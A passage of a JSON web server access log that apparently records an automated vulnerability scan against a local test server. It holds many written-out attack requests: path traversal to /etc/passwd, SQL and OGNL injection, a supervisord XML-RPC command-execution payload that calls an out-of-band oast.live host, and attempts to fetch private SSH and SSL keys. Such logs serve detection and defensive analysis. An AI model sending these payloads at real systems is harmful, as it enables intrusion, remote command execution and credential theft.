"18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ssl/127.0.0.1.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/redirect.php?plugins[]=../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"action=setup_wizard_cancel&html_response_page=ftpserver.asp&html_response_return_page=ftpserver.asp","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply_sec.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apps HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/log/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json;%0aa.ico?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /_next/../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/warn.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fw.progrss.details.php?popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/logoff.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CFIDE/scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/74 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphql/schema.xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /id_rsa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/rk.php?goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /home HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.css?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/tutor/views/pages/instructors.php?sub_page=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfide/scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/75 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A Administrator\x0D\x0A Administrator\x0D\x0A bi\x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /xmlpserver/services/XMLPService HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /desktopmodules/telerikwebui/radeditorprovider/telerik.web.ui.dialoghandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mrtg/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphql/schema.yaml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /users/sign_in HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /id_dsa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event1=&event2=&event3=&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /accounts/login?next=/admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfcache.map HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"\x0D\x0A supervisor.supervisord.options.warnings.linecache.os.system\x0D\x0A \x0D\x0A \x0D\x0A nslookup ca28fg0smpvbd3qg07h0szaeeausz7t1u.oast.live\x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /RPC2 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.js?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/debug.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /PRESENTATION/HTML/TOP/PRTINFO.HTML HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /README.md HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"{\x22hapi\x22:{\x22username\x22:\x22Administrator\x22,\x22password\x22:\x22any_password\x22,\x22language\x22:\x22en\x22,\x22mode\x22:\x22gui\x22, \x22usesshkey\x22:true, \x22privatekey\x22:\x22any_privateky\x22, \x22passphrase\x22:\x22any_passphase\x22,\x22settings\x22:{\x22output_filter\x22:\x22passed\x22,\x22port_number\x22:\x22444\x22}}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /session/create HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CF_SFSD/scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/76 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /desktopmodules/dnnwerk.radeditorprovider/dialoghandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MRTG/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.ssh/id_rsa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event3=352513&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///var HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:52 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /common/download/resource?resource=/profile/../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", 